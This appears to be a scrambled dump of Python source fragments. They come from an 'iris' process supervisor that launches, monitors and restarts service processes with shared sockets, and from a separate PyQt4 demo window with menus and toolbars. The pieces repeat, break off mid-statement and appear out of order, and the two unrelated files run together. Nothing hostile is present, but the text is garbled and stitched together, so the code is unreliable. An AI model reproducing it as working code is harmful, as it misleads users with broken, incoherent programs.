= [] self._services = [] def stats(self): process_stats = []", "'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name,", "six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds =", "gevent import subprocess from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets", "in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets:", "1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets()", "iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd", "start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try:", "import psutil import six from gevent import subprocess from six.moves import range from", "p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), })", "service processes to die ...\") self.running = False for p in self.processes: p.stop()", "= logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env =", "[] self.running = False self._sockets = [] self._services = [] def stats(self): process_stats", "to die ...\") self.running = False for p in self.processes: p.stop() super(Node, self).on_stop()", "sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock", "for process in self.processes: process.stop() def watch_processes(self): while True: for process in self.processes:", "self._process = None self._popen = None def 
is_running(self): return self._process and self._process.is_running() def", "= self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p", "[] self._services = [] def stats(self): process_stats = [] for p in self.processes:", "try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in", "*args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running =", "self.processes: process.stop() def watch_processes(self): while True: for process in self.processes: try: status =", "self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms':", "import os import psutil import six from gevent import subprocess from six.moves import", "in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] =", "def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self):", "import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__)", "cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die ...\")", "True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd,", "= json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in", "self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self,", "six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint", 
"Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process =", "import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self,", "self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes", "= {} self.processes = [] self.running = False self._sockets = [] self._services =", "subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except", "= subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait()", "psutil import six from gevent import subprocess from six.moves import range from iris.core.interfaces", "= self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except", "p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name, c", "s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE']", "host, port in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port),", "while True: for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if", "self.running = False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for", "for all service processes to die ...\") self.running = False for p in", "self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes':", "port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in 
self.processes: process.stop() def", "cmd self.env = env self._process = None self._popen = None def is_running(self): return", "c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for", "s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env", "in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})):", "= False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name,", "all service processes to die ...\") self.running = False for p in self.processes:", "p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self,", "from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger", "Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd,", "print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return", "= process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD):", "json import logging import gevent import os import psutil import six from gevent", "config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name,", "'%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for", "logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to", "for p in 
self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port", "port in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True)", "def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms},", "in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] =", "env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for", "and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid)", "Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets =", "if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats}", "on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running = False for", "create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket( '%s:%s' % (host", "process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses',", "self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess:", "continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config):", "range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def", "Process(cmd.split(' '), env=env) 
self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for", "self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] =", "False self._sockets = [] self._services = [] def stats(self): process_stats = [] for", "} except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args,", "self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket( '%s:%s'", "= os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i", "env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num):", "status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE,", "create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd", "{})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'),", "memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), }", "self.cmd = cmd self.env = env self._process = None self._popen = None def", "= shared_fds for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting", "self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start()", "p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in", "import 
json import logging import gevent import os import psutil import six from", "die ...\") self.running = False for p in self.processes: p.stop() super(Node, self).on_stop() def", "self._popen = None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen =", "import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd =", "create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self):", "'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator =", "self.running = False self._sockets = [] self._services = [] def stats(self): process_stats =", "%s\" % self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return {", "psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node,", "def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for port, s", "pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory", "def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True: for process", "'), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all", "logger.info(\"waiting for all service processes to die ...\") self.running = False for p", "c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets',", "c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() 
for port,", "apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for", "{} self.processes = [] self.running = False self._sockets = [] self._services = []", "= [] self.running = False self._sockets = [] self._services = [] def stats(self):", "service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] =", "def create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket( '%s:%s' %", "restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info()", "stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu':", "self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno()", "self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running = False self._sockets =", "psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if self.running: process.restart()", "import gevent import os import psutil import six from gevent import subprocess from", "% self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory':", "= self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split(' '),", "p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock =", "memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False", "self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, 
close_fds=False) self._process = psutil.Process(self._popen.pid) def", "def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = []", "self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self):", "for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(),", "return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return", "def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1)))", "for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd)", "% (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process", "def watch_processes(self): while True: for process in self.processes: try: status = process._process.status except", "def is_running(self): return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env,", "c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True", "self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds", "self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock", "i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start()", "self._sockets = [] self._services = [] def stats(self): process_stats = [] for p", "def 
restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory =", "return {'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name,", "from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object):", "return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process", "watch_processes(self): while True: for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess:", "env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service", "def on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running = False", "stats(self): process_stats = [] for p in self.processes: if not p.is_running(): continue process_stats.append({", "processes to die ...\") self.running = False for p in self.processes: p.stop() super(Node,", "process_stats = [] for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command':", "psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\"", "{'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface):", "self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss':", "psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try:", "import six from gevent import subprocess from six.moves import range from iris.core.interfaces import", "}) 
return {'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})):", "port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy()", "is_running(self): return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False)", "logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env", "(host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in", "self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess:", "except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if self.running:", "= create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def", "None self._popen = None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen" ]
[ "exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu =", "self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location", "initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction =", "edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q')", "QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit)", "Every PyQt4 application must create an application object #print sys.argv[1:] ex = Example1()", "# set location of app windows on screen and its size self.setWindowTitle('GUI Demo')", "a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is", "tool bar QAction with addAction for event handling(setting hot keys,showing status tip) set", "self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500,", "#print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling starts from this", "menubar = self.menuBar() 
menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to", "a window with menu bar and tool bar QAction with addAction for event", "menu bar and tool bar QAction with addAction for event handling(setting hot keys,showing", "QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self):", "in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name')", "QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not", "sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling starts from this point", "window on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are", "coding: utf-8 -*- ''' a window with menu bar and tool bar QAction", "you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept()", "self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app windows on", "sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else:", "python # -*- coding: utf-8 -*- ''' a window with menu bar and", "# binding the action to the menu in menubar # toolbar self.toolbar =", "from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, 
self).__init__()", "join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit", "tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons", "= QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of", "self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) #", "else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def", "set location of app windows on screen and its size self.setWindowTitle('GUI Demo') #", "the window on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message',", "PyQt4 application must create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_())", "PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI()", "= QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application", "''' a window with menu bar and tool bar QAction with addAction for", "''' import os from os.path import join import sys from PyQt4 import QtGui,QtCore", "<reponame>yzwxx/Label_Lab<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- ''' a window with menu", "= self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the", "qbtn.move(100, 300) # status bar # 
self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the", "= Example1() sys.exit(app.exec_()) # The event handling starts from this point if __name__", "app windows on screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path))", "10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button',", "create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint())", "application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling starts", "import os from os.path import join import sys from PyQt4 import QtGui,QtCore icon_path", "with menu bar and tool bar QAction with addAction for event handling(setting hot", "self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu", "Example1() sys.exit(app.exec_()) # The event handling starts from this point if __name__ ==", "Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is", "keys,showing status tip) set window icon ''' import os from os.path import join", "reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp =", "= QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar()", "event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,", "for event handling(setting hot keys,showing status tip) set window icon ''' import os", "join import sys from PyQt4 import QtGui,QtCore icon_path = 
join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def", "__init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit)", "<b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300)", "exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar =", "super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) #", "and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif',", "QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry()", "self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app windows on screen", "event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main():", "event handling(setting hot keys,showing status tip) set window icon ''' import os from", "self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This", "icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget')", "self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') 
self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set", "center the window on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self,", "= QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object #print sys.argv[1:]", "status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen", "with addAction for event handling(setting hot keys,showing status tip) set window icon '''", "def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit()", "Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit =", "self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350)", "import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def", "is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint())", "sys.exit(app.exec_()) # The event handling starts from this point if __name__ == '__main__':", "and tool bar QAction with addAction for event handling(setting hot keys,showing status tip)", "= QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", 
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if", "= QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application')", "addAction for event handling(setting hot keys,showing status tip) set window icon ''' import", "handling(setting hot keys,showing status tip) set window icon ''' import os from os.path", "its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10))", "-*- coding: utf-8 -*- ''' a window with menu bar and tool bar", "the action to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)", "550, 350) # set location of app windows on screen and its size", "btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar", "self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to", "# text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit',", "# menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') #", "self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') #", "self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show() def", "ex = Example1() sys.exit(app.exec_()) # The event handling starts from this point if", "hot keys,showing 
